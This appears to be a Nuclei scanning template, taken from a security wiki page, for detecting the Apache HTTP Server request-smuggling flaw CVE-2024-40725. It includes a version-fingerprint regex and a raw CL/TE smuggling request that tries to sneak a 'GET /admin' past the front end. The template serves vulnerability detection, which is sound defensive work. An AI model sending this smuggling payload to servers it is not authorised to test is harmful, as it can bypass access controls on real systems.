CVE-2024-40725

Apache HTTP Server Request Smuggling

id: CVE-2024-40725
info:
  name: Apache HTTP Server HTTP Request Smuggling (CVE-2024-40725)
  author: Redflare Cyber
  severity: high
  description: Detects the presence of CVE-2024-40725 vulnerability in Apache HTTP Server using HTTP Request Smuggling techniques.
  reference:
    - https://github.com/TAM-K592/CVE-2024-40725-CVE-2024-40898
  tags: cve, http-request-smuggling, apache, mod_proxy

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: header
        regex:
          - "Server: Apache/2\\.4\\.[0-5][0-9]"
          - "Server: Apache/2\\.4\\.6[0-1]"
        name: server_version

    matchers:
      - type: regex
        part: header
        regex:
          - "Server: Apache/2\\.4\\.[0-5][0-9]"
          - "Server: Apache/2\\.4\\.6[0-1]"

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Connection: Keep-Alive, Proxy-Authenticate

    matchers:
      - type: regex
        part: header
        regex:
          - "Proxy-Authenticate"

  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 0
        Transfer-Encoding: chunked

        0

        GET /admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: smuggle-test

    matchers:
      - type: word
        part: body
        words:
          - "admin"
      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: header
        regex:
          - "Server: Apache/2\\.4\\.[0-5][0-9]"
          - "Server: Apache/2\\.4\\.6[0-1]"
        name: server_version
PreviousSymfony F#ck UNextSSRF check

Last updated